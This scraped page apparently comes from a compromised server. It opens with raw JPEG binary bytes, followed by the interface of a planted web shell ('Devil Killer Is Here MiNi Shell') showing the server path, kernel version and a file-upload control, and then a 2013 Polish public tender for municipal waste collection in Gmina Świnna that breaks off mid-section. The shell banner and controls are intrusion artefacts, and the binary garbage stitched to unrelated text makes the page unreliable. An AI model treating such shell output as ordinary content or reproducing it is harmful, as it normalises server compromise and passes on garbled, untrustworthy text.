JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/249491-N-2013.html

<p class="kh_header"><b>Świnna: Odbiór  i  zagospodarowanie  odpadów  komunalnych  z  terenu Gminy  Świnna.</b><br>
<b>Numer ogłoszenia: 249491 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Świnnej , ul. Wspólna 13, 34-331 Świnna, woj. śląskie, tel. 033 863-80-23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.swinna.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór  i  zagospodarowanie  odpadów  komunalnych  z  terenu Gminy  Świnna..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia jest świadczenie usług w zakresie odbierania odpadów   
   komunalnych z nieruchomości zamieszkałych  i niezamieszkałych położonych na terenie  Gminy Świnna i  zagospodarowanie tych odpadów w roku 2014.
   Usługi obejmują odbiór i zagospodarowanie (odzysk lub unieszkodliwienie) całego   
   strumienia odpadów  komunalnych przekazanych od nieruchomości zamieszkałych i 
   niezamieszkałych  położonych na terenie gminy Świnna, w sposób zapewniający 
   osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami, oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, a także ich transport do instalacji regionalnej lub instalacji zastępczej do  obsługi regionu, zgodnie z zapisami:
-  ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( j.t. Dz. U. z 2012 r. poz. 391, z późn. zm.),
-   ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (j.t. Dz. U. z 2008 r. Nr 25, poz. 150, ze zm.), 
-  Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r.( Dz. U. z 2012 r.  poz. 645 ) w sprawie poziomu recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych.
-  ustawy z dnia 14 grudnia 2012 r. o odpadach (j.t. Dz. U. z 2013 r. poz. 21)
-  rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.  U. z 2013 r. poz. 122).
-  Planu Gospodarki Odpadami - Uchwała Nr IV/25/1/2012 z dnia 24 sierpnia 2012r. Sejmiku  Województwa   Śląskiego  z  dnia 29 sierpnia 2012 r. w sprawie Planu  Gospodarki  Odpadami  dla  Województwa  Śląskiego 2014.
A także:
   - Uchwała  Nr  XXXII/174/12 Rady Gminy Świnna z dnia 20 grudnia 2012r. w sprawie    Regulaminu utrzymania czystości i porządku na terenie Gminy Świnna,                                                
   - Uchwała Nr XXXII/175/12 Rady Gminy Świnna z dnia 20 grudnia 2012r. w sprawie 
     szczegółowego  sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów,
   - Uchwała Nr XXXII/179/12 Rady Gminy Świnna z dnia 20 grudnia 2012r. w sprawie 
     rodzajów dodatkowych usług świadczonych przez gminę w zakresie odbierania  odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  wysokości cen za te usługi. 

2. Zamówienie obejmuje:
1.1) Odbieranie od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu  Gminy Świnna następujących rodzajów odpadów: 
a) papier i tektura, metale, tworzywa sztuczne 
b) szkło i odpady opakowaniowe ze szkła
c) odpady organiczne: zielone i kuchenne
d) żużle i popioły z kotłów c.o.
e) niesegregowane (zmieszane) odpady komunalne
f) zużyty sprzęt elektryczny i elektroniczny
g) odpady wielkogabarytowe

Częstotliwość odbioru odpadów: 
a) segregowane surowce wtórne i balast- raz w miesiącu,
b) żużel (popioły) - raz w miesiącu, 
    c) meble i inne odpady wielkogabarytowe,
      -  sprzęt elektroniczny, 
      -  przeterminowane leki i chemikalia,
      - zużyte baterie i akumulatory,
      - farby, rozpuszczalniki, oleje odpadowe,
      - lampy żarowe, halogenowe i świetlówki,
      - opakowania po środkach ochrony roślin i nawozach powstających w rodzinnych 
         gospodarstwach   domowych,
     - zużyte opony,
      dwa razy w roku (w miesiącu kwietniu i październiku),
     d) odpady organiczne: zielone i kuchenne - dwa razy w miesiącu. 

Miejsce odbioru - odpady odbierane będą spod bram (wyjazdów) wszystkich posesji zamieszkałych i niezamieszkałych. 

1.2) Dostęp do niektórych nieruchomości może być utrudniony z uwagi na: niewystarczającą 
       szerokość niektórych dróg dojazdowych do nieruchomości, rodzaj nawierzchni 
       niektórych dróg dojazdowych, ukształtowanie terenu oraz znaczne nachylenie niektórych  ulic, dróg dojazdowych.
1.3) Ilość wytworzonych odpadów komunalnych, które będzie trzeba odebrać i    
     zagospodarować szacuje się na około 1 600 Mg.
1.4) czyszczenie placów manewrowych zamiatarką mechaniczna na przystankach końcowych autobusów w Świnnej, Przyłękowie, Rychwałdku, Pewli Małej, Pewli Ślemieńskiej i Trzebini oraz innych miejsc wskazanych przez Zamawiającego - ok- 1500 m2.
1.5) Utrzymanie w czystości przystanków MZK, PKS ( 32 szt ) we  wszystkich sołectwach na  terenie  Gminy Świnna -  jeden  raz  w  tygodniu  ( piątek)  i  opróżnianie  wszystkich koszy - 32  szt. 
3. Działania informacyjne
Obowiązkiem Wykonawcy jest zamieszczenie na swojej stronie internetowej informacji o gospodarce odpadami komunalnymi w gminie Świnna Na przedmiotowej stronie Wykonawca zamieści Harmonogram odbioru odpadów, Harmonogramy odbioru odpadów wielkogabarytowych.
Na przedmiotowej stronie Wykonawca będzie również zamieszczał inne informacje w sprawie zamówienia, przekazane przez Zamawiającego lub zatwierdzone przez Zamawiającego. Ponadto w terminie 14 dni od dnia akceptacji Harmonogramu odbioru odpadów przez Zamawiającego, Wykonawca dostarczy do każdego właściciela nieruchomości z której odbierane są odpady Harmonogram odbioru odpadów  w wersji papierowej. 4.Transport i zagospodarowanie.
a. Zaleca się by Wykonawca zapoznał się z ukształtowaniem terenu gminy i dostosował  środki  transportu do specyfiki terenu.
b. Wykonawca wyposaży pojazdy, przeznaczone do wykonywania usługi w urządzenie  zapewniające bieżący monitoring pracy tj. odbiornik GPS z możliwością  podglądu pojazdów monitorowanych przez upoważnionego   pracownika UG Świnna
c. Zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości,
d. Wykonawca przekazuje odebrane od właścicieli nieruchomości zmieszane odpady 
    komunalne, odpady zielone, oraz pozostałości z sortowania odpadów komunalnych   przeznaczone do składowania do regionalnych instalacji do przetwarzania odpadów  komunalnych wynikających z Planu Gospodarki Odpadami Komunalnymi dla  Województwa Śląskiego, tj. Regionalnej Instalacji Przetwarzania Odpadów Komunalnych  w Regionie IV, lub instalacji zastępczej dla obsługi regionu. 
e. Wykonawca winien przekazywać odebrane od właścicieli nieruchomości  selektywnie zebrane odpady komunalne do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z  obowiązującymi przepisami.  
f. Wykonawca winien gospodarować  odebranymi odpadami w sposób zapewniający 
     wywiązywanie się z powierzonych przez Zamawiającego Wykonawcy obowiązków 
     nałożonych ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. z 2012 r. poz. 391 ze zm.), zgodnie   z  rozporządzeniami wydanymi na podstawie art. 3b ust 2 i art. 3c ust. 2 ustawy tj.:
- rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów 
  recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych  frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645),  
- rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów 
  ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do 5. Inne ustalenia i wymagania dot. realizacji zadania.
DO OBOWIĄZKÓW WYKONAWCY W SZCZEGÓLNOŚCI NALEŻY:
1.	Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami prawa. 
a)Sprawozdawczość
 
a) Przez cały okres trwania Umowy Wykonawca będzie przekazywał Zamawiającemu 
    następujące dokumenty, 
w terminie do 25 dnia miesiąca następującego po miesiącu rozliczeniowym :
- raport o ilości i rodzaju odpadów komunalnych (ilość worków frakcjami) zebranych z wyszczególnionych nieruchomości, (raport winien obejmować nazwę miejscowości, nr porządkowy nieruchomości, ilość worków z podziałem na odpady segregowane i balast),
- raport o ilości i rodzaju odpadów wielkogabarytowych, elektrycznych i elektronicznych oraz niebezpiecznych (Mg z podziałem na frakcje) odebranych podczas objazdowej zbiórki, 
- raport o sposobie zagospodarowania odpadów ze wskazaniem instalacji, na którą zostały przekazane, potwierdzone kartami przekazania odpadów.
b.przez cały okres trwania Umowy Wykonawca będzie przekazywał Zamawiającemu sprawozdania kwartalne zgodne z art. 9n ust. 1-3 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości  i porządku w gminach (t.j. Dz. U. z 2012 r. poz. 391 ze zm.) oraz  z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. (Dz. U. z 2012 r. poz. 630) w sprawie wzoru sprawozdań   o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych, oraz realizacji zadań  z zakresu gospodarowania odpadami komunalnymi, do końca miesiąca następującego po kwartale, którego dotyczy. Dodatkowo Wykonawca przekaże takie sprawozdanie w formie elektronicznej.
c. wraz z kolejnymi kwartalnymi sprawozdaniami należy przedłożyć Zamawiającemu wykaz nieruchomości, które nie były zamieszczone we wcześniejszym wykazie, a odebrano z nich w okresie objętym sprawozdaniem odpady komunalne, ze wskazaniem ilości i rodzajów odpadów jakie odebrano
d. wykonawca jest zobowiązany do osiągnięcia poziomu recyklingu, przygotowania do ponownego użycia i odzysku frakcji odpadów obejmujących:  papier ,metale, tworzywa sztuczne, szkło, inne niż niebezpieczne odpady budowlane i rozbiórkowe, wyliczalnych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomu recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji komunalnych (Dz. U. z 2012 r. poz.645).
2.Kontrola rzetelności segregacji:
Powiadomienie Gminy w przypadku niedopełniania przez właściciela nieruchomości obowiązku  w zakresie selektywnego zbierania odpadów komunalnych.  

3.Harmonogram odbioru i zagospodarowanie odpadów komunalnych

a. dokonywanie odbioru odpadów komunalnych sprzed nieruchomości zgodnie ze   sporządzonym przez  Wykonawcę harmonogramem. Harmonogram zatwierdza Zamawiający.
b. wszelkie zmiany harmonogramu wymagają formy pisemnej, za wyjątkiem zmian jednorazowych wynikających z nadzwyczajnych sytuacji, np. powódź, gwałtowne opady śniegu, nieprzejezdna droga, dni ustawowo wolne; zmiana harmonogramu nie stanowi zmiany umowy,
c. dostarczenie wszystkim właścicielom nieruchomości harmonogramu wywozu odpadów komunalnych na rok 2014.
d. wykonawca ujmie w harmonogramie zgłoszone przez Zamawiającego uwagi, oraz nowe punkty wywozowe -  w ciągu 7 dni od zgłoszenia,

4.INNE OBOWIĄZKI WYKONAWCY:
a). wykonanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz niedogodności dla mieszkańców Gminy,
b).zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy, dostatecznej liczby środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi,
c).porządkowanie terenu zanieczyszczonego odpadami wysypanymi z worków i pojazdów w trakcie realizacji usługi odbioru,
d).garażowanie pojazdów do realizacji przedmiotu zamówienia wyłącznie na terenie posiadanej bazy magazynowo-transportowej,
e). wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy,
f).dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do nieruchomości będzie utrudniony z powodu: prowadzonych remontów dróg, dojazdów, złych warunków atmosferycznych, konfiguracji terenu itp. Wykonawcy nie przysługują wtedy roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy,
g).okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa,
h).ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy,
i).naprawa lub ponoszenie kosztów naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych w gminie,
j).umożliwienie wstępu na teren bazy transportowej przedstawicielom Zamawiającego 
lub pracownikom państwowych instytucji upoważnionych do kontroli realizacji ustawy 
o odpadach i ustawy o utrzymaniu czystości i porządku w gminach z przepisami wykonawczymi,
k).uczestnictwo upoważnionego przedstawiciela Wykonawcy w naradach (posiedzeniach komisji Rady Gminy, innych naradach) prowadzonych przez Zamawiającego, na których omawiane będą zadania związane z realizacją przedmiotu umowy. Zaproszenia na narady będą przekazywane Wykonawcy z wyprzedzeniem nie mniej niż 7 dni przed tymi naradami,
l).udostępnienie co najmniej jednej linii telefonicznej w celu szybkiej komunikacji, tak aby był możliwy stały kontakt przedstawiciela Zamawiającego z Wykonawcą,
ł).udostępnia worków do gromadzenia odpadów w sposób selektywny, które będą przekazywane nieodpłatnie mieszkańcom gminy przy każdym odbiorze w takiej samej ilości i rodzaju jakie zostały odebrane (cena worków wliczona w cenę oferty). Worki na surowce wtórne muszą spełniać następujące wymagania:
  - być wykonane z tworzywa o wytrzymałości nie mniejszej niż dla tworzywa LDPE o    grubości    minimum 0,03 mm,
- wyglądać estetycznie, być trwałe i oznakowane rodzajem odpadów, jakie mają być do niego zbierane 
- integralną częścią worka powinien być element umożliwiający jego skuteczne zawiązanie.
m)   Odpady komunalne będą odbierane od wszystkich mieszkańców z terenu gminy Świnna, z uwagi na górzysty teren zaleca  się  przeprowadzenie  wizji   lokalnej w miejscu wykonywania przedmiotu zamówienia, celem rzetelnego  przygotowania  się   wykonawcy   do  złożenia oferty. 

n) Tereny o utrudnionym dojeździe z uwagi na ukształtowanie  terenu wymagające użycia  specjalistycznego sprzętu mechanicznego:

sołectwo Pewel Ślemieńska 
- ul. Bukowa,  droga gruntowa - polna  o nienormatywnej szerokości  - 3 nieruchomości   
   zamieszkałe,
Sołectwo Świnna
- Odnoga  ul. Pielgrzymów i  ul. Kasztelańskiej, droga gruntowa - polna  o nienormatywnej 
   szerokości  -  1 nieruchomość  zamieszkała,
- Odnoga   ul.  Komarnik  -  droga  gruntowa  -  polna  o  nienormatywnej  szerokości  -  
  1  nieruchomość  zamieszkała.

6. CHARAKTERYSTYKA ZAMAWIAJĄCEGO:  

1.	Charakterystka Gminy  Świnna:
Powierzchnia gminy wynosi   39,40 km2
         Gmina obejmuje sześć sołectw: Świnna,  Przyłęków, Pewel Mała, Pewel Ślemieńska, 
         Rychwałdek, Trzebinia. 
         Liczba mieszkańców, którzy będą objęci usługą odbierania odpadów komunalnych  
         (nieruchomości zamieszkałe i niezamieszkałe )  - około 8 000 osób.
         Długość dróg na terenie Gminy Świnna  wynosi:  55,049 km,
         18,5 km   dróg powiatowych
           4,5 km  dróg wojewódzkich.
2.	Nieruchomości:

2.1.Nieruchomości zamieszkałe:
	Liczba nieruchomości wg segregacji
	TAK	NIE
Pewel Mała	380	17
Pewel Ślemieńska	382	5
Przyłęków	92	---
Rychwałdek	208	4
Świnna	558	13
Trzebinia	407	5

ŁĄCZNIE - 2071  nieruchomości, z których 2027 (97,88%) zadeklarowało oddawanie odpadów w sposób selektywny.

2.2.Nieruchomości niezamieszkałe:
Pewel Mała:
Działalność gospodarcza 		-36
Domki letniskowe			-58
Zespół Szkolno- Przedszkolny	-1
GOPS					-1
Budynek komunalny			-1
Ośrodek Zdrowia			-1
Parafia					-1
Cmentarz				-1
OSP					-1

Pewel Ślemieńska:

Działalność gospodarcza 				-13
Domki letniskowe					-23
Zespół Szkolny					-1
Budynek komunalny					-1
Parafia							-1	
Cmentarz komunalny					-1
OSP							-1

Przyłęków:

Działalność gospodarcza 				-4
Domki letniskowe					-14
Szkoła Podstawowa					-1
Parafia							-1
Cmentarz						-1	
OSP							-1

Rychwałdek:

Działalność gospodarcza 				-13
Domki letniskowe					-8
Szkoła Podstawowa					-1
OSP							-1

Świnna:

Działalność gospodarcza 				-39
Domki letniskowe					-49
Zespół Szkolno-Przedszkolny 			-1
Urząd Pocztowy					-1
Urząd Gminy						-1
Gminny Ośrodek Kultury				-1
Gminna Biblioteka					-1
Parafia							-1
OSP							-1
Cmentarz komunalny					-1

Trzebinia:

Działalność gospodarcza 				-15
Domki letniskowe					-7
Zespół Szkolno - Przedszkolny			-1
Parafia							-1
Cmentarz komunalny					-1	
OSP							-1

ŁĄCZNIE - 294 nieruchomości, z których  227  (77,21%)   zadeklarowało  oddawanie segregowanych  odpadów.
Podana ilość  nieruchomości objętych zbiórką odpadów w okresie realizacji umowy może ulec zmianie.

7. INNE INFORMACJE.
W 2012 roku ilość i rodzaj odpadów komunalnych odebranych od właścicieli, położonych na terenie gminy Świnna, przez uprawnione podmioty (dane ze sprawozdań kwartalnych i kart przekazania odpadów z przeprowadzonych zbiórek) przedstawia się następująco:  (IV kw. 2012r.  i  I,II,III kw.2013r.)

KOD ODPADU	NAZWA	MASA [Mg]
20 03 01	niesegregowane (zmieszane) odpady komunalne	439,9
10 01 01	żużle i popioły	882,0
15 01 07	opakowania ze szkła	132,5
15 01 06	Zmieszane odpady opakowaniowe	0,50
17 01 04	Zmieszane odpady z budowy, remontów i demontażu	5,2
20 02 03	Odpady nie ulegające biodegradacji	21,8
15 01 02	Opakowania z tworzyw sztucznych	81,3
20 01 01	Papier i tektura	1,0
20 01 34	Baterie i akumulatory	0,1
20 01 01	Odpady kuchenne ulegające biodegradacji	1,3
20 02 01	Odpady ulegające biodegradacji	12,4
20 01 23	Urządzenia zawierające freony	2,1
16 01 03	Zużyte opony	0,8
20 01 35 i  20 01 36	Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki i zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21,20 01 23 i 20 01 35	8,3
20 03 07	odpady wielkogabarytowe	10,8
	Suma 	1 600,00






Określoną ilość w/w odpadów należy traktować orientacyjnie, ich ilość w roku  2014 może ulec zmianie. 

Odpady segregowane poza określonymi w harmonogramie terminami mogą być przez właściciela posesji dowożone do PSZOK. Punkt ten mieści się w Żywcu ul. Bracka 51 
składowania oraz sposobu  obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta  powinna   być  zabezpieczona  wadium  w  wysokości 5 000,00  zł   (słownie :  pięćtysięcyzłotych00/100) najpóźniej do dnia 2 grudnia  2013r.  do  godziny   9.30  w   następujących  formach: 
    a) w  pieniądzu  płatne  przelewem  na   rachunek  bankowy  Urząd  Gminy  w  Świnnej, ul.  Wspólna  13,    34 - 331  Świnna   prowadzony   przez   Bank   Spółdzielczy  w Radziechowach - Wieprzu  nr  konta  12  8140  0009  0000  1124  2000  0060,  do oferty   należy  załączyć kopię polecenia przelewu.
    b) poręczeniach   bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym, 
    c) gwarancjach  bankowych,
    d) gwarancjach ubezpieczeniowych,
    e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy   z  dnia  9  listopada  2000 r.  o  utworzeniu   Polskiej   Agencji   Rozwoju 
Przedsiębiorczości ( Dz. U. z  2007r.  Nr  42,  poz.  275, z 2008r. Nr 116, poz. 730 i 732 i Nr 227, poz.1505 oraz z 2010r. Nr 96, poz. 620). 
2. Jeżeli wadium jest wnoszone w formie innej niż pieniądz, oryginały dokumentów, o 
    których mowa wyżej należy złożyć w kasie Urzędu Gminy w Świnnej, natomiast do oferty   należy załączyć ich kserokopię. 
3. Przy  wnoszeniu  wadium  przelewem,  dniem  wniesienia  jest  dzień uznania na rachunku Zamawiającego kwoty wadium.
4.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego   oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp  (tj. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie 
   złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  lub pełnomocnictw,   chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
6.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych   w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie  umowy w  sprawie  zamówienia  publicznego  stało się  niemożliwe  z  przyczyn leżących  po  stronie  Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy posiadają  uprawnienia niezbędne do wykonania określonej działalności lub czynności, 
        jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w gminach, w zakresie  odpowiadającym  przedmiotowi zamówienia;
 a) Aktualne zezwolenie na prowadzenie działalności w zakresie transportu i zbierania  
odpadów, wydane    przez właściwy organ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
